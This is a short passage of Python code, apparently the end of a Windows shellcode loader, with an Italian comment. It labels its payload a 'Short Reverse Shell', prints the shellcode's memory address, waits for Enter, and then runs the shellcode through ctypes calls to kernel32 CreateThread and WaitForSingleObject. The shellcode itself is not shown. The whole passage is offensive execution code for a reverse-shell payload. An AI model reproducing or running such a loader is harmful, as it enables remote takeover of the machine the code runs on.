print("Shellcode: Short Reverse Shell")
print("Shellcode address = %s" % hex(ptr))
input("\n[?] Press Enter to execute the shellcode: ")
# Eseguo lo shellcode in un nuovo thread, su cui faccio la join
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))